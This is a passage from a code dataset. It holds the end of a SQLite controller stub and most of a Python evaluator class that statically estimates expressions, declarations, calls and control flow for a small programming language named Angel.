pprint(find)\n\n def Update(self, q, opt=[]):\n print(self.dbtype, sys._getframe().f_code.co_name, q)\n\n def Delete(self, q, opt=[]):\n print(self.dbtype, sys._getframe().f_code.co_name, q)\n","sub_path":"app/src/SQLiteController.py","file_name":"SQLiteController.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"501071808","text":"import typing as t\nfrom typing import Iterable\nimport unittest\nfrom copy import copy\nfrom collections import namedtuple\nfrom decimal import Decimal\nfrom functools import partial\nfrom itertools import zip_longest\n\nfrom . 
import estimation_nodes as enodes, nodes, environment, errors, type_checking, environment_entries as entries\nfrom .enums import DeclType\nfrom .utils import submangle, dispatch, NODES, EXPRESSIONS, ASSIGNMENTS, apply_mapping\nfrom .constants import (\n builtin_funcs, private_builtin_funcs, string_fields, vector_fields, dict_fields, SELF_NAME, SPEC_LINE\n)\nfrom .context import Context\n\n\nEstimatedObjects = namedtuple(\n \"EstimatedObjects\", [\n 'builtin_funcs', 'private_builtin_funcs', 'string_fields', 'vector_fields', 'dict_fields'\n ]\n)\nEstimatedFields = t.Dict[str, t.Union[t.Callable[..., enodes.Expression], enodes.Expression]]\n\n\nclass Evaluator(unittest.TestCase):\n def __init__(\n self, estimated_objs: EstimatedObjects, context: Context, env: environment.Environment\n ) -> None:\n super().__init__()\n self.env = env\n self.code = errors.Code()\n self.repl_tmp_count = 0\n self.context = context\n self.type_checker = type_checking.TypeChecker(context, self.env)\n self.type_checker.estimator = self\n\n self.estimated_objs = estimated_objs\n\n self.expression_dispatcher = {\n nodes.Name: self.estimate_name,\n nodes.SpecialName: self.estimate_special_name,\n nodes.Field: self.estimate_field,\n nodes.Subscript: self.estimate_subscript,\n nodes.BinaryExpression: self.estimate_binary_expression,\n nodes.Cast: self.estimate_cast,\n nodes.Ref: self.estimate_ref,\n nodes.Parentheses: lambda expr: self.estimate_expression(expr.value),\n nodes.FunctionCall: self.estimate_function_call,\n nodes.MethodCall: self.estimate_method_call,\n nodes.BuiltinFunc: lambda func: self.estimated_objs.builtin_funcs[func.value],\n nodes.PrivateBuiltinFunc: lambda func: self.estimated_objs.private_builtin_funcs[func.value],\n nodes.Decl: self.estimate_decl,\n nodes.NamedArgument: lambda argument: self.estimate_expression(argument.value),\n\n nodes.OptionalSomeCall: self.estimate_optional_some_call,\n nodes.OptionalSomeValue: self.estimate_optional_some_value,\n nodes.OptionalTypeConstructor: self.estimate_optional_constructor,\n\n nodes.IntegerLiteral: self.estimate_integer_literal,\n nodes.DecimalLiteral: self.estimate_decimal_literal,\n nodes.StringLiteral: self.estimate_string_literal,\n nodes.CharLiteral: self.estimate_char_literal,\n nodes.BoolLiteral: self.estimate_bool_literal,\n nodes.VectorLiteral: self.estimate_vector_literal,\n nodes.DictLiteral: self.estimate_dict_literal,\n }\n\n add_dispatcher = {\n (enodes.DynamicValue, enodes.DynamicValue): self.estimate_add_dyn_values,\n (enodes.Int, enodes.Int): self.estimate_add_ints,\n (enodes.String, enodes.String): self.estimate_add_strings,\n (enodes.Vector, enodes.Vector): self.estimate_add_vectors,\n (enodes.Instance, enodes.Instance): partial(\n self.estimate_arithmetic_operation_instances, nodes.SpecialMethods.add\n ),\n (enodes.DynamicValue, enodes.String): self.estimate_add_dyn_value_and_string,\n }\n\n sub_dispatcher = {\n (enodes.Int, enodes.Int): self.estimate_sub_ints,\n (enodes.Instance, enodes.Instance): partial(\n self.estimate_arithmetic_operation_instances, nodes.SpecialMethods.sub\n ),\n }\n\n mul_dispatcher = {\n (enodes.Int, enodes.Int): self.estimate_mul_ints,\n (enodes.Instance, enodes.Instance): partial(\n self.estimate_arithmetic_operation_instances, nodes.SpecialMethods.mul\n ),\n }\n\n div_dispatcher = {\n (enodes.Int, enodes.Int): self.estimate_div_ints,\n (enodes.Instance, enodes.Instance): partial(\n self.estimate_arithmetic_operation_instances, nodes.SpecialMethods.div\n ),\n }\n\n eq_dispatcher: t.Dict[t.Tuple[type, type], 
t.Callable] = {\n (enodes.Int, enodes.Int): lambda x, y, xe, ye: enodes.Bool(xe.value == ye.value),\n (enodes.String, enodes.String): lambda x, y, xe, ye: enodes.Bool(xe.value == ye.value),\n (enodes.Char, enodes.Char): lambda x, y, xe, ye: enodes.Bool(xe.value == ye.value),\n (enodes.Bool, enodes.Bool): lambda x, y, xe, ye: enodes.Bool(xe.value == ye.value),\n (enodes.OptionalConstructor, enodes.OptionalConstructor): lambda x, y, xe, ye: enodes.Bool(xe.value == ye.value),\n (enodes.Instance, enodes.Instance): self.estimate_eq_instances,\n\n (enodes.OptionalSomeCall, enodes.OptionalConstructor): lambda x, y, xe, ye: enodes.Bool(False),\n }\n\n lt_dispatcher = {\n (enodes.Int, enodes.Int): lambda x, y, xe, ye: enodes.Bool(xe.value < ye.value),\n }\n\n gt_dispatcher = {\n (enodes.Int, enodes.Int): lambda x, y, xe, ye: enodes.Bool(xe.value > ye.value),\n }\n\n self.binary_operator_dispatcher = {\n nodes.Operator.add.value: lambda x, y, xe, ye: dispatch(\n add_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n nodes.Operator.sub.value: lambda x, y, xe, ye: dispatch(\n sub_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n nodes.Operator.mul.value: lambda x, y, xe, ye: dispatch(\n mul_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n nodes.Operator.div.value: lambda x, y, xe, ye: dispatch(\n div_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n\n nodes.Operator.eq_eq.value: lambda x, y, xe, ye: dispatch(\n eq_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n nodes.Operator.lt.value: lambda x, y, xe, ye: dispatch(\n lt_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n nodes.Operator.gt.value: lambda x, y, xe, ye: dispatch(\n gt_dispatcher, (type(xe), type(ye)), x, y, xe, ye\n ),\n\n nodes.Operator.and_.value: self.estimate_binary_expression_and,\n nodes.Operator.or_.value: self.estimate_binary_expression_or,\n }\n\n self.estimate_field_dispatcher = {\n enodes.String: lambda base, f: self.estimate_builtin_field(self.estimated_objs.string_fields, base, f),\n enodes.Vector: lambda base, f: self.estimate_builtin_field(self.estimated_objs.vector_fields, base, f),\n enodes.Dict: lambda base, f: self.estimate_builtin_field(self.estimated_objs.dict_fields, base, f),\n enodes.Instance: self.estimate_instance_field,\n enodes.Algebraic: self.estimate_algebraic_field,\n enodes.AlgebraicConstructorInstance: self.estimate_algebraic_constructor_instance_field,\n enodes.Ref: self.estimate_ref_field,\n enodes.DynamicValue: self.estimate_dyn_field,\n }\n\n self.assignment_dispatcher = {\n nodes.Name: self.estimate_name_assignment,\n nodes.Field: self.estimate_field_assignment,\n nodes.Subscript: self.estimate_subscript_assignment,\n }\n\n self.node_dispatcher = {\n nodes.Decl: self.estimate_decl,\n nodes.FunctionDeclaration: self.estimate_function_declaration,\n nodes.FieldDeclaration: self.estimate_field_declaration,\n nodes.InitDeclaration: self.estimate_init_declaration,\n nodes.MethodDeclaration: self.estimate_method_declaration,\n nodes.StructDeclaration: self.estimate_struct_declaration,\n nodes.ExtensionDeclaration: self.estimate_extension_declaration,\n nodes.AlgebraicDeclaration: self.estimate_algebraic_declaration,\n nodes.InterfaceDeclaration: self.estimate_interface_declaration,\n nodes.FunctionCall: self.estimate_expression,\n nodes.InitCall: self.estimate_init_call,\n nodes.MethodCall: self.estimate_expression,\n\n nodes.Return: self.estimate_return,\n nodes.Break: self.estimate_break,\n nodes.Assignment: lambda statement: dispatch(\n self.assignment_dispatcher, 
type(statement.left), statement.left, statement.right\n ),\n nodes.While: self.estimate_while_statement,\n nodes.For: self.estimate_for_statement,\n nodes.If: self.estimate_if_statement,\n }\n\n def estimate_node(self, node: nodes.Node) -> t.Optional[enodes.Expression]:\n return dispatch(self.node_dispatcher, type(node), node)\n\n def estimate_ast(self, ast: Iterable[nodes.Node]) -> t.Optional[enodes.Expression]:\n result = None\n for node in ast:\n result = self.estimate_node(node)\n if result is not None and not isinstance(result, enodes.Void):\n return result\n return result\n\n def estimate_decl(self, node: nodes.Decl) -> None:\n assert node.type is not None\n estimated = None\n if node.value is not None:\n estimated = self.estimate_expression(node.value)\n self.env.add_declaration(node, estimated_value=estimated)\n\n def estimate_function_declaration(self, declaration: nodes.FunctionDeclaration) -> None:\n self.env.add_function(\n declaration.line, declaration.name, declaration.parameters, declaration.arguments, declaration.return_type,\n declaration.where_clause\n )\n self.env.update_function_body(declaration.name, declaration.body)\n\n def estimate_method_declaration(self, declaration: nodes.MethodDeclaration) -> None:\n self.env.add_method(declaration.line, declaration.name, declaration.arguments, declaration.return_type)\n self.env.update_method_body(declaration.name, declaration.body)\n\n def estimate_init_declaration(self, declaration: nodes.InitDeclaration) -> None:\n self.env.add_init_declaration(declaration.line, declaration.arguments)\n self.env.update_init_declaration_body(declaration.arguments, declaration.body)\n\n def estimate_init_call(self, call: nodes.InitCall) -> None:\n pass\n\n def estimate_struct_declaration(self, declaration: nodes.StructDeclaration) -> None:\n # list(...) for mypy\n self.env.add_struct(declaration.line, declaration.name, declaration.parameters, declaration.interfaces)\n self.env.inc_nesting(declaration.name)\n self.estimate_ast(list(declaration.fields.all))\n self.estimate_ast(list(declaration.init_declarations))\n self.estimate_ast(list(declaration.methods.all))\n self.env.dec_nesting(declaration.name)\n\n def estimate_extension_declaration(self, declaration: nodes.ExtensionDeclaration) -> None:\n # list(...) 
for mypy\n self.env.inc_nesting(declaration.name)\n self.estimate_ast(list(declaration.methods.all))\n self.env.dec_nesting(declaration.name)\n\n def estimate_algebraic_declaration(self, declaration: nodes.AlgebraicDeclaration) -> None:\n self.env.add_algebraic(declaration.line, declaration.name, declaration.parameters)\n self.env.inc_nesting(declaration.name)\n self.estimate_ast(list(declaration.constructors))\n self.estimate_ast(list(declaration.methods.all))\n self.env.dec_nesting(declaration.name)\n\n def estimate_interface_declaration(self, declaration: nodes.InterfaceDeclaration) -> None:\n self.env.add_interface(\n declaration.line, declaration.name, declaration.parameters, declaration.implemented_interfaces\n )\n self.env.inc_nesting(declaration.name)\n self.estimate_ast(list(declaration.fields))\n self.estimate_ast(list(declaration.methods))\n self.env.dec_nesting(declaration.name)\n\n def estimate_field_declaration(self, declaration: nodes.FieldDeclaration) -> None:\n self.env.add_field(declaration.line, declaration.name, declaration.type)\n\n def estimate_name_assignment(self, name: nodes.Name, value: nodes.Expression) -> None:\n if name.module:\n assert 0, \"Module system is not supported\"\n right = self.estimate_expression(value)\n entry = self.env[name.member]\n # Estimation is performed after name checking.\n assert entry is not None\n if isinstance(entry, entries.DeclEntry) and entry.is_constant:\n assert not entry.has_value\n entry.estimated_value = right\n entry.has_value = True\n elif isinstance(entry, entries.DeclEntry) and entry.is_variable:\n entry.estimated_value = right\n else:\n assert 0, f\"REPL cannot reassign {type(entry)}\"\n\n def estimate_field_assignment(self, field: nodes.Field, value: nodes.Expression) -> None:\n estimated_value = self.estimate_expression(value)\n # @Cleanup: Move to dispatcher\n if isinstance(field.base, nodes.Name):\n assert not field.base.module\n base_entry = self.env[field.base.member]\n assert isinstance(base_entry, entries.DeclEntry) and base_entry.is_variable\n if isinstance(base_entry.estimated_value, enodes.Instance):\n base_entry.estimated_value.fields[field.field.member] = estimated_value\n elif isinstance(base_entry.estimated_value, enodes.Ref):\n base_entry.estimated_value.initial_expression = value\n base_entry.estimated_value.value = estimated_value\n else:\n assert 0, f\"Cannot estimate field assignment {field.to_code()} = {value.to_code()}\"\n elif isinstance(field.base, nodes.SpecialName):\n base_entry = self.env[field.base.value]\n assert isinstance(base_entry, entries.DeclEntry) and base_entry.is_variable\n assert isinstance(base_entry.estimated_value, enodes.Instance)\n base_entry.estimated_value.fields[field.field.member] = estimated_value\n else:\n assert 0, f\"Cannot estimate field assignment with base '{field.base}'\"\n\n def estimate_subscript_assignment(self, subscript: nodes.Subscript, value: nodes.Expression) -> None:\n estimated_value = self.estimate_expression(value)\n estimated_index = self.estimate_expression(subscript.index)\n assert isinstance(estimated_index, enodes.Int)\n assert isinstance(estimated_value, enodes.Char)\n # @Cleanup: Move to dispatcher\n if isinstance(subscript.base, nodes.Name):\n assert not subscript.base.module\n base_entry = self.env[subscript.base.member]\n # @Cleanup: separate this functionality to a function and use it in estimation of subscript\n assert isinstance(base_entry, entries.DeclEntry) and base_entry.is_variable\n assert isinstance(base_entry.estimated_value, 
enodes.String)\n new_value = list(base_entry.estimated_value.value)\n new_value[estimated_index.value] = estimated_value.value\n base_entry.estimated_value.value = \"\".join(new_value)\n else:\n assert 0, f\"Cannot estimate subscript with base '{subscript.base}'\"\n\n def estimate_while_statement(self, statement: nodes.While) -> t.Optional[enodes.Expression]:\n condition, body, assignment = self.desugar_if_let(statement.condition, statement.body)\n estimated_condition = self.estimate_expression(condition)\n if assignment is not None:\n body.append(assignment)\n assert isinstance(estimated_condition, enodes.Bool)\n while estimated_condition.value:\n result = self.estimate_ast(body)\n if isinstance(result, enodes.Break):\n break\n elif result is not None:\n return result\n estimated_condition = self.estimate_expression(condition)\n assert isinstance(estimated_condition, enodes.Bool)\n return None\n\n def estimate_for_statement(self, statement: nodes.For) -> t.Optional[enodes.Expression]:\n container = self.estimate_expression(statement.container)\n if isinstance(container, enodes.Vector):\n elements: t.Iterable = container.elements\n element_type = container.element_type\n elif isinstance(container, enodes.String):\n elements = (enodes.Char(char) for char in container.value)\n element_type = nodes.BuiltinType.char\n else:\n raise NotImplementedError\n self.env.inc_nesting()\n for element in elements:\n self.env.add_declaration(\n nodes.Decl(statement.line, DeclType.constant, statement.element, element_type),\n estimated_value=element\n )\n result = self.estimate_ast(statement.body)\n if isinstance(result, enodes.Break):\n break\n elif result is not None and not isinstance(result, enodes.Void):\n self.env.dec_nesting()\n return result\n self.env.dec_nesting()\n return None\n\n def desugar_if_let(\n self, condition: nodes.Expression, body: nodes.AST\n ) -> t.Tuple[nodes.Expression, nodes.AST, t.Optional[nodes.Assignment]]:\n assignment = None\n if isinstance(condition, nodes.Decl) and condition.is_constant:\n assert condition.value is not None\n tmp_right = self.create_repl_tmp(condition.value)\n to_prepend: t.List[nodes.Node] = [\n nodes.Decl(\n condition.line, DeclType.variable, condition.name, condition.type,\n nodes.OptionalSomeValue(tmp_right)\n )\n ]\n body = to_prepend + body\n assignment = nodes.Assignment(\n condition.line, tmp_right, nodes.Operator.eq, condition.value\n )\n condition = nodes.BinaryExpression(tmp_right, nodes.Operator.neq, nodes.OptionalTypeConstructor.none)\n return condition, body, assignment\n\n def estimate_if_statement(self, statement: nodes.If) -> t.Optional[enodes.Expression]:\n condition, body, _ = self.desugar_if_let(statement.condition, statement.body)\n evaluated_condition = self.estimate_expression(condition)\n assert isinstance(evaluated_condition, enodes.Bool)\n if evaluated_condition.value:\n return self.estimate_ast(body)\n for elif_condition, elif_body in statement.elifs:\n elif_condition, elif_body, _ = self.desugar_if_let(elif_condition, elif_body)\n cond = self.estimate_expression(elif_condition)\n assert isinstance(cond, enodes.Bool)\n if cond.value:\n return self.estimate_ast(elif_body)\n return self.estimate_ast(statement.else_)\n\n def create_repl_tmp(self, value: nodes.Expression) -> nodes.Name:\n name = nodes.Name(\"__repl_tmp\" + str(self.repl_tmp_count))\n self.repl_tmp_count += 1\n self.env.add_declaration(\n nodes.Decl(SPEC_LINE, DeclType.variable, name, self.infer_type(value), value),\n estimated_value=self.estimate_expression(value)\n 
)\n return name\n\n def estimate_return(self, statement: nodes.Return) -> enodes.Expression:\n return self.estimate_expression(statement.value)\n\n def estimate_break(self, _: nodes.Break) -> enodes.Break:\n return enodes.Break()\n\n def estimate_eq_instances(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Instance, ye: enodes.Instance\n ) -> enodes.Expression:\n result = self.estimate_method_call(\n nodes.MethodCall(\n SPEC_LINE, x, method=nodes.Name(nodes.SpecialMethods.eq.value), arguments=[y], instance_type=xe.type\n )\n )\n assert result\n return result\n\n def estimate_add_dyn_values(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.DynamicValue, ye: enodes.DynamicValue\n ) -> enodes.Expression:\n return xe\n\n def estimate_add_ints(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Int, ye: enodes.Int\n ) -> enodes.Int:\n value = xe.value + ye.value\n new_type = self.infer_type(nodes.IntegerLiteral(str(value)))\n assert isinstance(new_type, nodes.BuiltinType)\n return enodes.Int(value, new_type)\n\n def estimate_add_strings(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.String, ye: enodes.String\n ) -> enodes.String:\n return enodes.String(xe.value + ye.value)\n\n def estimate_add_dyn_value_and_string(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.DynamicValue, ye: enodes.String\n ) -> enodes.Expression:\n assert isinstance(xe.type, nodes.BuiltinType) and xe.type == nodes.BuiltinType.string\n return enodes.DynamicValue(nodes.BuiltinType.string)\n\n def estimate_add_vectors(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Vector, ye: enodes.Vector\n ) -> enodes.Vector:\n element_type = xe.element_type\n if not xe.elements:\n element_type = ye.element_type\n return enodes.Vector(xe.elements + ye.elements, element_type)\n\n def estimate_arithmetic_operation_instances(\n self, method_name: nodes.SpecialMethods, x: nodes.Expression, y: nodes.Expression,\n xe: enodes.Instance, ye: enodes.Instance\n ) -> enodes.Instance:\n assert xe.type == ye.type\n entry = self.env.get(xe.type)\n assert isinstance(entry, entries.StructEntry)\n method_entry = entry.methods[submangle(nodes.Name(method_name.value), self.context).member]\n result = self.perform_function_call(\n method_entry.to_estimated_function(), [y], nodes.Argument(SELF_NAME, xe.type, x)\n )\n assert isinstance(result, enodes.Instance)\n return result\n\n def estimate_sub_ints(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Int, ye: enodes.Int\n ) -> enodes.Int:\n value = xe.value - ye.value\n new_type = self.infer_type(nodes.IntegerLiteral(str(value)))\n assert isinstance(new_type, nodes.BuiltinType)\n return enodes.Int(value, new_type)\n\n def estimate_mul_ints(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Int, ye: enodes.Int\n ) -> enodes.Int:\n value = xe.value * ye.value\n new_type = self.infer_type(nodes.IntegerLiteral(str(value)))\n assert isinstance(new_type, nodes.BuiltinType)\n return enodes.Int(value, new_type)\n\n def estimate_div_ints(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Int, ye: enodes.Int\n ) -> enodes.Int:\n if ye.value == 0:\n raise errors.AngelDivByZero\n value = int(Decimal(xe.value) / Decimal(ye.value))\n new_type = self.infer_type(nodes.IntegerLiteral(str(value)))\n assert isinstance(new_type, nodes.BuiltinType)\n # TODO: move to enodes.Float(value, new_type)\n return enodes.Int(int(value), new_type)\n\n def estimate_expression(self, expression: nodes.Expression) -> 
enodes.Expression:\n return dispatch(self.expression_dispatcher, type(expression), expression)\n\n def estimate_name(self, name: nodes.Name) -> enodes.Expression:\n if name.module:\n assert 0, \"Module system is not supported\"\n entry = self.env[name.member]\n # Estimation is performed after name checking.\n assert entry is not None, name.member\n if isinstance(entry, entries.DeclEntry):\n return entry.estimated_value\n elif isinstance(entry, entries.FunctionEntry):\n return entry.to_estimated_function()\n elif isinstance(entry, entries.StructEntry):\n return enodes.Struct(entry.name)\n elif isinstance(entry, entries.AlgebraicEntry):\n return enodes.Algebraic(entry.name, entry)\n else:\n # @Completeness: must have branches for all entry types\n assert 0, f\"{self.estimate_name} cannot dispatch entry type {type(entry)}\"\n\n def estimate_builtin_field(\n self, fields: EstimatedFields, base: enodes.Expression, field: nodes.Name\n ) -> enodes.Expression:\n estimated = fields[field.unmangled or field.member]\n if callable(estimated):\n return estimated(base)\n return estimated\n\n def estimate_algebraic_field(self, base: enodes.Algebraic, field: nodes.Name) -> enodes.Expression:\n return enodes.AlgebraicConstructor(base.name, field, entry=base.entry.constructors[field.member])\n\n def estimate_algebraic_constructor_instance_field(\n self, base: enodes.AlgebraicConstructorInstance, field: nodes.Name\n ) -> enodes.Expression:\n found = base.fields.get(field.member)\n if found is not None:\n return found\n constructor_entry = self.env.get_algebraic(\n nodes.AlgebraicType(base.type.name, parameters=[], constructor=base.type.constructor)\n )\n assert isinstance(constructor_entry, entries.StructEntry)\n method_entry = constructor_entry.methods.get(field.member)\n if method_entry is None:\n algebraic_entry = self.env.get(base.type.name)\n assert isinstance(algebraic_entry, entries.AlgebraicEntry)\n method_entry = algebraic_entry.methods[field.member]\n return method_entry.to_estimated_function()\n\n def estimate_instance_field(self, base: enodes.Instance, field: nodes.Name) -> enodes.Expression:\n found = base.fields.get(field.member)\n if found is not None:\n return found\n struct_entry = self.env[base.type.member]\n assert isinstance(struct_entry, entries.StructEntry)\n field_name = submangle(field, self.context).member\n method_entry = struct_entry.methods.get(field_name, struct_entry.methods.get(field.member))\n assert method_entry\n return method_entry.to_estimated_function()\n\n def estimate_ref_field(self, ref: enodes.Ref, field: nodes.Name) -> enodes.Expression:\n assert (field.unmangled or field.member) == 'value'\n return ref.value\n\n def estimate_dyn_field(self, dyn_value: enodes.DynamicValue, field: nodes.Name) -> enodes.Expression:\n assert isinstance(dyn_value.type, nodes.Name)\n entry = self.env.get(dyn_value.type)\n assert isinstance(entry, entries.StructEntry)\n field_entry = entry.fields[field.member]\n assert isinstance(field_entry, entries.DeclEntry)\n return enodes.DynamicValue(field_entry.type)\n\n def estimate_field(self, field: nodes.Field) -> enodes.Expression:\n base = self.estimate_expression(field.base)\n return dispatch(self.estimate_field_dispatcher, type(base), base, field.field)\n\n def estimate_subscript(self, subscript: nodes.Subscript) -> enodes.Expression:\n base = self.estimate_expression(subscript.base)\n # @Cleanup: Move to dispatcher\n if isinstance(base, enodes.String):\n index = self.estimate_expression(subscript.index)\n assert isinstance(index, 
enodes.Int)\n return enodes.Char(base.value[index.value])\n elif isinstance(base, enodes.Vector):\n index = self.estimate_expression(subscript.index)\n assert isinstance(index, enodes.Int)\n return base.elements[index.value]\n elif isinstance(base, enodes.Dict):\n index = self.estimate_expression(subscript.index)\n return base.values[base.keys.index(index)]\n else:\n assert 0, f\"Cannot estimate subscript from '{base}'\"\n\n def estimate_special_name(self, special_name: nodes.SpecialName) -> enodes.Expression:\n return self.estimate_name(nodes.Name(special_name.value))\n\n def estimate_function_call(self, call: nodes.FunctionCall) -> t.Optional[enodes.Expression]:\n \"\"\"Estimate function or struct call.\n 1. Get the function/struct estimated object\n 2. Create an environment based on the environment that was available before function/struct declaration\n 3. Override names with arguments\n 4. Run the body\n 5. Return the result if the function returns one\n \"\"\"\n function = self.estimate_expression(call.function_path)\n if isinstance(function, enodes.Struct):\n if function.name.module:\n assert 0, \"Module system is not supported\"\n struct_entry = self.env[function.name.member]\n assert isinstance(struct_entry, entries.StructEntry)\n return self.match_init_declaration(function, list(struct_entry.init_declarations.values()), call.arguments)\n assert isinstance(function, enodes.Function)\n arguments = call.arguments\n if function.name == nodes.BuiltinFunc.print.value:\n arg_type = self.infer_type(arguments[0])\n arguments = [\n nodes.Cast(\n call.arguments[0], nodes.BuiltinType.string, is_builtin=isinstance(arg_type, nodes.BuiltinType)\n )\n ]\n return self.perform_function_call(function, arguments)\n\n def match_algebraic_constructor_init(\n self, algebraic_constructor: enodes.AlgebraicConstructor, init_declarations: t.List[entries.InitEntry],\n arguments: t.List[nodes.Expression]\n ) -> enodes.AlgebraicConstructorInstance:\n result = self.match_init_declaration(enodes.Struct(algebraic_constructor.constructor), init_declarations, arguments, algebraic=algebraic_constructor.name)\n return enodes.AlgebraicConstructorInstance(algebraic_constructor, result.fields)\n\n def match_init_declaration(\n self, struct: enodes.Struct, init_declarations: t.List[entries.InitEntry], arguments: t.List[nodes.Expression],\n algebraic: t.Optional[nodes.Name] = None\n ) -> enodes.Instance:\n estimated_arguments = [self.estimate_expression(argument) for argument in arguments]\n matched = True\n expected_major = []\n if algebraic:\n struct_entry: entries.Entry = self.env.get_algebraic(\n nodes.AlgebraicType(algebraic, [], constructor=struct.name)\n )\n else:\n struct_entry = self.env.get(struct.name)\n assert isinstance(struct_entry, entries.StructEntry)\n\n for init_entry in init_declarations:\n struct_mapping: t.Dict[str, nodes.Type] = {}\n for param in struct_entry.parameters:\n struct_mapping[param.member] = self.type_checker.create_template_type()\n\n for arg, value in zip_longest(init_entry.arguments, arguments):\n if value is None:\n value = arg.value\n if arg is None or value is None:\n matched = False\n break\n arg_type = apply_mapping(arg.type, struct_mapping)\n try:\n self.infer_type(value, arg_type)\n except errors.AngelTypeError:\n matched = False\n break\n else:\n arg_type = self.type_checker.replace_template_types(arg_type)\n if not matched:\n matched = True\n expected_major.append([arg.type for arg in init_entry.arguments])\n continue\n self.env.inc_nesting()\n self.env.add_declaration(\n 
nodes.Decl(0, DeclType.variable, SELF_NAME, struct.name),\n estimated_value=enodes.Instance(struct.name)\n )\n for arg, value, estimated in zip_longest(init_entry.arguments, arguments, estimated_arguments):\n if value is None:\n value = arg.value\n estimated = self.estimate_expression(value)\n assert estimated is not None and value is not None\n self.env.add_declaration(\n nodes.Decl(0, DeclType.constant, arg.name, arg_type, value), estimated_value=estimated\n )\n if len(init_entry.body) == 1 and isinstance(init_entry.body[0], nodes.InitCall):\n return self.match_init_declaration(\n struct, init_declarations, init_entry.body[0].arguments, algebraic\n )\n self.estimate_ast(init_entry.body)\n self_entry = self.env[nodes.SpecialName.self.value]\n assert isinstance(self_entry, entries.DeclEntry) and self_entry.is_variable\n self_value = self_entry.estimated_value\n assert isinstance(self_value, enodes.Instance)\n self.env.dec_nesting()\n return self_value\n expected = \" or \".join(\n (\"(\" + \", \".join(type_.to_code() for type_ in type_list) + \")\" for type_list in expected_major)\n )\n raise errors.AngelWrongArguments(expected, self.code, arguments)\n\n def perform_function_call(\n self, function: enodes.Function, arguments: t.List[nodes.Expression],\n self_argument: t.Optional[nodes.Argument] = None\n ) -> t.Optional[enodes.Expression]:\n \"\"\"\n 1. Estimate the arguments and the self_argument\n 2. Create an environment based on function.saved_environment\n 3. Populate that environment with the arguments and the self argument\n 4. Call function's body\n \"\"\"\n estimated_arguments = [self.estimate_expression(argument) for argument in arguments]\n if not isinstance(function.specification, list):\n if self_argument:\n assert self_argument.value\n estimated_arguments = [self.estimate_expression(self_argument.value)] + estimated_arguments\n return function.specification(*estimated_arguments)\n\n if self_argument:\n assert self_argument.value\n estimated_self: t.Optional[enodes.Expression] = self.estimate_expression(self_argument.value)\n else:\n estimated_self = None\n\n environment_backup = copy(self.env)\n self.env = environment.Environment(function.saved_environment)\n if self_argument:\n self.env.add_declaration(\n nodes.Decl(SPEC_LINE, DeclType.variable, SELF_NAME, self_argument.type, self_argument.value),\n estimated_value=estimated_self\n )\n\n for argument, expression, estimated in zip_longest(function.arguments, arguments, estimated_arguments):\n self.env.add_declaration(\n nodes.Decl(SPEC_LINE, DeclType.constant, argument.name, argument.type, expression),\n estimated_value=estimated\n )\n\n result = self.estimate_ast(function.specification)\n self.env = environment_backup\n return result\n\n def estimate_method_call(self, call: nodes.MethodCall) -> t.Optional[enodes.Expression]:\n method = self.estimate_expression(nodes.Field(call.line, call.instance_path, call.method))\n if isinstance(method, enodes.Function):\n assert call.instance_type\n return self.perform_function_call(\n method, call.arguments, nodes.Argument(SELF_NAME, call.instance_type, call.instance_path)\n )\n elif isinstance(method, enodes.AlgebraicConstructor):\n algebraic_entry = self.env.get(method.name)\n assert isinstance(algebraic_entry, entries.AlgebraicEntry)\n constructor_entry = algebraic_entry.constructors[method.constructor.member]\n return self.match_algebraic_constructor_init(\n method, list(constructor_entry.init_declarations.values()), call.arguments\n )\n else:\n assert 0, f\"Cannot estimate method 
call with estimated method {method}\"\n\n def estimate_binary_expression_and(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Expression, ye: enodes.Expression\n ) -> enodes.Bool:\n assert isinstance(xe, enodes.Bool) and isinstance(ye, enodes.Bool)\n return enodes.Bool(xe.value and ye.value)\n\n def estimate_binary_expression_or(\n self, x: nodes.Expression, y: nodes.Expression, xe: enodes.Expression, ye: enodes.Expression\n ) -> enodes.Bool:\n assert isinstance(xe, enodes.Bool) and isinstance(ye, enodes.Bool)\n return enodes.Bool(xe.value or ye.value)\n\n def estimate_binary_expression(self, expression: nodes.BinaryExpression) -> enodes.Expression:\n if expression.operator.value == nodes.Operator.is_.value:\n if isinstance(expression.left, nodes.BuiltinType):\n if not isinstance(expression.right, nodes.BuiltinType):\n return enodes.Bool(False)\n if expression.right.value in expression.left.get_builtin_supertypes():\n return enodes.Bool(True)\n return enodes.Bool(False)\n if expression.right == nodes.BuiltinType.object_:\n return enodes.Bool(True)\n assert isinstance(expression.left, nodes.Name)\n assert isinstance(expression.right, (nodes.Name, nodes.BuiltinType, nodes.GenericType))\n entry = self.env.get(expression.left)\n assert isinstance(entry, (entries.StructEntry, entries.ParameterEntry))\n if entry.implements_interface(expression.right):\n return enodes.Bool(True)\n return enodes.Bool(False)\n left = self.estimate_expression(expression.left)\n right = self.estimate_expression(expression.right)\n if expression.operator.value == nodes.Operator.neq.value:\n result = dispatch(\n self.binary_operator_dispatcher, nodes.Operator.eq_eq.value, expression.left,\n expression.right, left, right\n )\n assert isinstance(result, enodes.Bool)\n return enodes.Bool(not result.value)\n elif expression.operator.value == nodes.Operator.lt_eq.value:\n result = dispatch(\n self.binary_operator_dispatcher, nodes.Operator.gt.value, expression.left, expression.right,\n left, right\n )\n assert isinstance(result, enodes.Bool)\n return enodes.Bool(not result.value)\n elif expression.operator.value == nodes.Operator.gt_eq.value:\n result = dispatch(\n self.binary_operator_dispatcher, nodes.Operator.lt.value, expression.left, expression.right,\n left, right\n )\n assert isinstance(result, enodes.Bool)\n return enodes.Bool(not result.value)\n return 